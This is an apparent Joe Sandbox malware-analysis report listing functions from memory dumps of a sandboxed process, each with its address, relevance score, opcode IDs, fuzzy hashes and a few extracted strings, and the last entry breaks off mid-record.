                                Function 00007FFD9B8F27ED Relevance: .1, Instructions: 116COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0296e8fa066ed156be4f992fde65a6908addb7b2e123454970a79296415391d7
                                • Instruction ID: 8b7bb3bc4af5c0cb58ec3d1939bab8a0328eef8b83dea131a4c7026882dbaff9
                                • Opcode Fuzzy Hash: 0296e8fa066ed156be4f992fde65a6908addb7b2e123454970a79296415391d7
                                • Instruction Fuzzy Hash: 93311A25B1E29A4FD716BF7898648E83B70EF45315B4642F7D098CB0E7DD28A4458391
                                Function 00007FFD9B8FAF3A Relevance: .1, Instructions: 111COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1b37288b8c1abddfc53ecb39b6f956e48558e2b4900b4dfb9836fde638492d2c
                                • Instruction ID: 48b4c11eeeefeec635ff8d46ff50e2fd0983c1ba5db1d9d584678b1e82dc2968
                                • Opcode Fuzzy Hash: 1b37288b8c1abddfc53ecb39b6f956e48558e2b4900b4dfb9836fde638492d2c
                                • Instruction Fuzzy Hash: A041A270B0E64E5FE752AB7488695E93FF0EF0A310F0645B7D448CB0A2EA38A9848741
                                Function 00007FFD9B8F268D Relevance: .1, Instructions: 108COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2c785f2de828326b42a556356bffa2c6f86e992730ed72661fca9eb9906ab215
                                • Instruction ID: e9b30e5a4fe17e8df67e98b49ef3bffca3c07f9e5d62f098a9894821df045cf4
                                • Opcode Fuzzy Hash: 2c785f2de828326b42a556356bffa2c6f86e992730ed72661fca9eb9906ab215
                                • Instruction Fuzzy Hash: 3E317730A1E7CD8FDB569FB488685A93FB0FF1A300F4545FBE458C60A2DB689954CB41
                                Function 00007FFD9B8F31F8 Relevance: .1, Instructions: 107COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dcafcf6d21026018d67decdf51e841de72584bd726326028d17a3f43b86b063e
                                • Instruction ID: fa79c48cd79049999952a170f9afd53495a0f63b57f862e3a91e8c52988b66ac
                                • Opcode Fuzzy Hash: dcafcf6d21026018d67decdf51e841de72584bd726326028d17a3f43b86b063e
                                • Instruction Fuzzy Hash: 9E410971F1A51E8EEB64EB94D864AEDBBB1FF58300F410139E009E72A5DA34AE448B50
                                Function 00007FFD9B8F0500 Relevance: .1, Instructions: 107COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 728854fa498ee7908f445aa1ae50d94e483e8a09c3d8c6a9f0780902a2ae454d
                                • Instruction ID: 595bc15d91271002c55ece202230a286b36b932c0cc38cacb6e7786f38e65261
                                • Opcode Fuzzy Hash: 728854fa498ee7908f445aa1ae50d94e483e8a09c3d8c6a9f0780902a2ae454d
                                • Instruction Fuzzy Hash: 4B316630A1E78D8FDB55DFA4C8685A93FF0FF19300F4545B6E418C61A6DA38E654CB41
                                Function 00007FFD9B8F09B0 Relevance: .1, Instructions: 105COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1624440abb98620990175e47000602e47c593058ca89c934bebeaa1c8bbb5038
                                • Instruction ID: 1272c314b5f960050f16abcf4fedbb808a52219b3aef79a779cef264eea57746
                                • Opcode Fuzzy Hash: 1624440abb98620990175e47000602e47c593058ca89c934bebeaa1c8bbb5038
                                • Instruction Fuzzy Hash: 3B31C431B2A50E8FE751EF78C8585B97BE0FF5C700F4245B6D419D60B6EE34AA448740
                                Function 00007FFD9B8FB238 Relevance: .1, Instructions: 99COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a6f792049f614c562e469264ff932d0a060dcbca037cdb58c66d14cbb3cc2bbc
                                • Instruction ID: 31003e2daaba34f43668c49514546333b239f67f2a6f7683e6ccb197bcfa9703
                                • Opcode Fuzzy Hash: a6f792049f614c562e469264ff932d0a060dcbca037cdb58c66d14cbb3cc2bbc
                                • Instruction Fuzzy Hash: E6419D34E1925E8FEB69DBA4C8642ED7BB1FF06304F01017AE449D72A1DB786A84CB40
                                Function 00007FFD9B8F04F8 Relevance: .1, Instructions: 88COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b0bc9343b5431ec83e7448f72a86b462a6e0820b3b7b63e3b8c01d7e11a8c981
                                • Instruction ID: 5a4aa9a228d722a4d8b38207de291c74bffee04aaa17c2243f5b07e4b15bd822
                                • Opcode Fuzzy Hash: b0bc9343b5431ec83e7448f72a86b462a6e0820b3b7b63e3b8c01d7e11a8c981
                                • Instruction Fuzzy Hash: F5315030A1A64ECFDB55EFA4C4686B97BE0FF19301F4104BAE419C61A5DE38AA54CB50
                                Function 00007FFD9B8F0991 Relevance: .1, Instructions: 87COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b29c2e241813e15bc53e53f3b47adee2e534ce55a005df8aa4ec8c645a8f51d4
                                • Instruction ID: 0bc76ba0a48876ec7225c4736831ba73cd5acc6b8f60f7fa2b25bc68db166176
                                • Opcode Fuzzy Hash: b29c2e241813e15bc53e53f3b47adee2e534ce55a005df8aa4ec8c645a8f51d4
                                • Instruction Fuzzy Hash: 9621B621F2F68E4FE7619F7488291F97FA0FF59600F4605B6D458D60E3EE29AA048781
                                Function 00007FFD9B8F3324 Relevance: .1, Instructions: 78COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1c6208619bcde4f3462698d75dfaa0a9445698eea7625e89a6d88a733ada5030
                                • Instruction ID: 34b304afdb366ac68e13f191b9409e2be24a8549b7b6c16b69fe48635300ec42
                                • Opcode Fuzzy Hash: 1c6208619bcde4f3462698d75dfaa0a9445698eea7625e89a6d88a733ada5030
                                • Instruction Fuzzy Hash: 7121F471F0951D8FEB64EB98D4A4AECBBF1FF98301F51017AD009E72A5DA386A40CB50
                                Function 00007FFD9B8F2D99 Relevance: .1, Instructions: 78COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 912987e38a175659fa3a1ffeaecd4cbe513917a41c1e098c53f6e2766915a966
                                • Instruction ID: b8f56989fe302edc70ce4757d861bca92ed3419d8d6cdf24ab7423c614e22789
                                • Opcode Fuzzy Hash: 912987e38a175659fa3a1ffeaecd4cbe513917a41c1e098c53f6e2766915a966
                                • Instruction Fuzzy Hash: 49218630A1E68E8FD755EFB488696B93FA0FF0A310F4545BAE418C60E2DB385A45C741
                                Function 00007FFD9B8F1FD9 Relevance: .1, Instructions: 62COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d831ef64adeafcb30de6f72ecff24d1f80a7879b692151bd9ed12cdd35f40b13
                                • Instruction ID: 0144828ad04ec052db809869fcdbe81b0a91e16938b001834b1cbd7922b88801
                                • Opcode Fuzzy Hash: d831ef64adeafcb30de6f72ecff24d1f80a7879b692151bd9ed12cdd35f40b13
                                • Instruction Fuzzy Hash: 12119E01A0F2C65AEB236BB948344616FA08F07224B1E46FFE0D88A0F3D90C5E4AC342
                                Function 00007FFD9B8F2718 Relevance: .1, Instructions: 60COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5d45c29ec7f04a83d78c879ceaee763e5ab2bed99a2c0e20cc834c84a080ad4c
                                • Instruction ID: eea2459422ece5a17453989e16290826e3ca39066e39787ca59f6bca96c95258
                                • Opcode Fuzzy Hash: 5d45c29ec7f04a83d78c879ceaee763e5ab2bed99a2c0e20cc834c84a080ad4c
                                • Instruction Fuzzy Hash: 12116A30A1E78DCFDB659FA488646B93FA0FF19300F4504BAE419C61E6DB78DA54CB41
                                Function 00007FFD9B8F05D8 Relevance: .0, Instructions: 43COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b69ba6e20d85eceea08ea103796b8b9856da7cdd3731501dae229c8cfc428159
                                • Instruction ID: 4b104b27ac234f18b6681b8a616fc50ff03242152ba31115b1a522d0dda6177e
                                • Opcode Fuzzy Hash: b69ba6e20d85eceea08ea103796b8b9856da7cdd3731501dae229c8cfc428159
                                • Instruction Fuzzy Hash: 63014F30B0950E8FDB98FF65C0646B97BE1FF5C305F51447ED40AC62A4CA36AA51CB80
                                Function 00007FFD9B8F0A18 Relevance: .0, Instructions: 42COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 27a1c9e52232fdfbc0290f60a9ca9590e80c120d2b6f9e806fbf2f0b3d7e128c
                                • Instruction ID: 24c03f60884a7cce6e63a663edad907a0ec1e0aa9fe31cdc81733eae6237f5ed
                                • Opcode Fuzzy Hash: 27a1c9e52232fdfbc0290f60a9ca9590e80c120d2b6f9e806fbf2f0b3d7e128c
                                • Instruction Fuzzy Hash: 5001A221F2A54E4EEBA0AFA888291FD7BA0FF48700F41057AD41CD60E2EE346E048780
                                Function 00007FFD9B8F0610 Relevance: .0, Instructions: 42COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2b54da5bb67be6a0331294714df3641a584107c5bb6c3610c5a1ab8ad898dcdf
                                • Instruction ID: 3e3f85755e881e019ae16f154937280db452c0ddb02bb78d9e61005f87be7c0c
                                • Opcode Fuzzy Hash: 2b54da5bb67be6a0331294714df3641a584107c5bb6c3610c5a1ab8ad898dcdf
                                • Instruction Fuzzy Hash: E4016230B1950E8BDB58EFA4C4695B97BA1FF18305FA1047EE41EC61E6DF35AA50C640
                                Function 00007FFD9B9012A0 Relevance: .0, Instructions: 37COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9edf74d8e9bbe3bd9d1201b4cd9af606b8c644fdadb6fb993d20f5c87f09d443
                                • Instruction ID: 5457151a9d4851994e78b7d59d6de795c671fd554b619d9f77a389bbc5dea185
                                • Opcode Fuzzy Hash: 9edf74d8e9bbe3bd9d1201b4cd9af606b8c644fdadb6fb993d20f5c87f09d443
                                • Instruction Fuzzy Hash: F8F06230A2551E9EEB58EFA8C4686BA7BE1FF19309F11047EE41AC21A1DE316680C700
                                Function 00007FFD9B8FBCBB Relevance: .0, Instructions: 36COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0b1620c43da95d1e06784a62530e18a03f5252a4ead24c6182c6583ecaa8dbf4
                                • Instruction ID: 36101be1d71c997cebd67ee2c45070dd77c4b12abbec15c1db99c1bdd2100815
                                • Opcode Fuzzy Hash: 0b1620c43da95d1e06784a62530e18a03f5252a4ead24c6182c6583ecaa8dbf4
                                • Instruction Fuzzy Hash: 9D012170F0A51E8EDF64EF90C495AFDBBB1EF58301F51457AD409A2295CE38AA84DBC0
                                Function 00007FFD9B8FBDD4 Relevance: .0, Instructions: 30COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 488043351cc7216ce70ca6478bf05b0e5f500d0cacf8e2273c738f241169c19c
                                • Instruction ID: c90da7f2dd729c1b5a6db05c1ddfb3346afc162a582ecd74b88e5ab73dc5bee7
                                • Opcode Fuzzy Hash: 488043351cc7216ce70ca6478bf05b0e5f500d0cacf8e2273c738f241169c19c
                                • Instruction Fuzzy Hash: 56F02670F1691D9EEBA5EF6888556E9BAB1FF5C300F9105F5A40DD22A1DF341E80CB50
                                Function 00007FFD9B8F0608 Relevance: .0, Instructions: 28COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 37ec873e2dc0066a3a29eaf89bb8a1798f947ff68f63e93ce4f5bdbaf1ccb445
                                • Instruction ID: 4fa1ae4391ad370b8a118c06bf72015deb1b784b446c6788a2a3e693bd1790ac
                                • Opcode Fuzzy Hash: 37ec873e2dc0066a3a29eaf89bb8a1798f947ff68f63e93ce4f5bdbaf1ccb445
                                • Instruction Fuzzy Hash: 93F06C30B1A64ECAEF69AFA484242BA3694FF08305F810879F41DC11D5DF386654CA81
                                Function 00007FFD9B8F0F7C Relevance: .0, Instructions: 26COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 316d9b8e7bbc6da8f413643cf67c82e994ff4f085359703a2c6cf42c3869ee0b
                                • Instruction ID: 9f6f3d3eaf19f9f204da73afb51f32c27c8c788be055869bab94fafcd8e10b9f
                                • Opcode Fuzzy Hash: 316d9b8e7bbc6da8f413643cf67c82e994ff4f085359703a2c6cf42c3869ee0b
                                • Instruction Fuzzy Hash: 44F0DA30B1A50D8FEB24EB54CC54BEDB7B1FB58701F5142A5D00AE3295DE786E818F80
                                Function 00007FFD9B8F1700 Relevance: .0, Instructions: 25COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000016.00000002.1875627771.00007FFD9B8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7ffd9b8f0000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7e923426db90b489bb3e4055a9089f803b057fd8c153bee60f99321c842b6262
                                • Instruction ID: 77d16f63e4180b92c1ca0f69138e12343a23da6b917f9b4f367cd5ebb8d21bd0
                                • Opcode Fuzzy Hash: 7e923426db90b489bb3e4055a9089f803b057fd8c153bee60f99321c842b6262
                                • Instruction Fuzzy Hash: F8E06521F0740A46EA749FDC84A563469D19B88304FFA8274F02CC61F2E92DEDC6C240

                                Executed Functions

                                Function 00007FFD9B9019AB Relevance: 2.8, Strings: 2, Instructions: 339COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID: )L_^$*L_^
                                • API String ID: 0-1724811391
                                • Opcode ID: d051ccffe35f66e5d76023db40e2baf7b1b5f5243ad5015343d90bb7ff637541
                                • Instruction ID: ffa649c16358faaac8ba8ea3cc748f99762904e448a737b08e00072c2e3dd7cc
                                • Opcode Fuzzy Hash: d051ccffe35f66e5d76023db40e2baf7b1b5f5243ad5015343d90bb7ff637541
                                • Instruction Fuzzy Hash: FAB1D822B0E6A65BDB11AB78AC794E57FB0EF0371871902F7E0998B0E3DD186549C345
                                Function 00007FFD9B903746 Relevance: 2.6, Strings: 2, Instructions: 95COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID: K_H$S,L_^
                                • API String ID: 0-2660599901
                                • Opcode ID: cbbebb0328288665ff10945f801c3709870cec13b3a6ca7d88823dc4112df5ed
                                • Instruction ID: c91631c74d31ded53613e8365b33807d94ba1025f2d5178279eb6bd938dcb667
                                • Opcode Fuzzy Hash: cbbebb0328288665ff10945f801c3709870cec13b3a6ca7d88823dc4112df5ed
                                • Instruction Fuzzy Hash: 4D318475B1990EAFDB54EB98D4A16A8B3E2FF98310B51423AE05DD3691CF34BC12C780
                                Function 00007FFD9B8FD310 Relevance: 1.6, Strings: 1, Instructions: 363COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID: sL_I
                                • API String ID: 0-325917797
                                • Opcode ID: 51d24e74a85ae35d70589a5c95ea083ea0dc467b16de222a99e686cd6a09d315
                                • Instruction ID: 0eab2b59673b2cbd3c3865ef49fb3bdf6ba06624d7b69473780934180009f9c4
                                • Opcode Fuzzy Hash: 51d24e74a85ae35d70589a5c95ea083ea0dc467b16de222a99e686cd6a09d315
                                • Instruction Fuzzy Hash: 94A10313F1E68A4AE77557AC28351B82F90EF89254B5A41BBE24EC71FBEC097D0243D1
                                Function 00007FFD9B904809 Relevance: 1.6, Strings: 1, Instructions: 330COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID: #@
                                • API String ID: 0-742695533
                                • Opcode ID: d101563fe18a6cda981f37df99c08ac288995da2837702eacf3f4b8daf55f71f
                                • Instruction ID: 3edffd9487e09e5f9f1d8d71932ae39876624adf8fa1b1b645d93c75d5643c4c
                                • Opcode Fuzzy Hash: d101563fe18a6cda981f37df99c08ac288995da2837702eacf3f4b8daf55f71f
                                • Instruction Fuzzy Hash: 27C1F2746296498FDB69DF58C4A17B437A1FF48300F5641BDD88ACB39BCA38E981CB40
                                Function 00007FFD9B904CE8 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-3916222277
                                • Opcode ID: 64cc6ccb08d87d30dd06e488ff14f5fa4188b7372ba10beb521a587e93aa7334
                                • Instruction ID: 427b9d265719cd307821686650bc162e244337d1a681af8f491693d84d4789b9
                                • Opcode Fuzzy Hash: 64cc6ccb08d87d30dd06e488ff14f5fa4188b7372ba10beb521a587e93aa7334
                                • Instruction Fuzzy Hash: 9D516B35E1961EAFDB59DB98D4A06FCB7B1EF54300F1141BED05AE73A6CA342A01CB50
                                Function 00007FFD9B8FEDE8 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-3916222277
                                • Opcode ID: 2c8541dac7c0e81b36cb80116604c64e2936da1de9e6b4f179fae717aa30f5a9
                                • Instruction ID: 5296be177cc5d3cf613e3a85a9b11e8486bd485625b515b1411f6a910124fe4d
                                • Opcode Fuzzy Hash: 2c8541dac7c0e81b36cb80116604c64e2936da1de9e6b4f179fae717aa30f5a9
                                • Instruction Fuzzy Hash: 99517D71F0964E8FDB69DB98D4615BDBBB1EF4C301F1140BAD019E76A6DA342D01CB90
                                Function 00007FFD9B903704 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID: {z}
                                • API String ID: 0-1552007774
                                • Opcode ID: 59856674b51b3c8bf12f48eeddd4511347748c35d23f1be3fc0b1d512d148f29
                                • Instruction ID: 50f092dbbcc4a02077d13ce58d7dd727a16613ec3fb6c62489ac51bfda4e2bab
                                • Opcode Fuzzy Hash: 59856674b51b3c8bf12f48eeddd4511347748c35d23f1be3fc0b1d512d148f29
                                • Instruction Fuzzy Hash: 43411426B1F68E5FE77646B858740A83FA1DF4A350B0B02BBD0D9CB1B3D9081E46C352
                                Function 00007FFD9B8FD01D Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID: S3
                                • API String ID: 0-3396860701
                                • Opcode ID: 87e6bb2b8f0ecebde7c4cce2814342d7b2cdd2e6755003e731064d25693af0d6
                                • Instruction ID: b16f0167677a1fce8be8c70c9bddebb6c8059849d7b31723c200472cc4d305d8
                                • Opcode Fuzzy Hash: 87e6bb2b8f0ecebde7c4cce2814342d7b2cdd2e6755003e731064d25693af0d6
                                • Instruction Fuzzy Hash: 2911C415A2F2DEAFD72747A448714B93F70AF43A00B1B01F7D0CACB0B3D9082A099366
                                Function 00007FFD9B900019 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000025.00000002.1836900390.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_37_2_7ffd9b8fd000_qwhJcOiWbbUoQMvwnJNr.jbxd
                                Similarity
                                • API ID:
                                • String ID: c
                                • API String ID: 0-112844655
                                • Opcode ID: a3925d73cb67aa4e70ff48a9a5252a0e3bc3e4386821ed5d3018ad48ff7b33d3
                                • Instruction ID: adaf7e51f6b33d04fe4b169ff67c83ac43cf3af24657fee6ac01019908046548
                                • Opcode Fuzzy Hash: a3925d73cb67aa4e70ff48a9a5252a0e3bc3e4386821ed5d3018ad48ff7b33d3
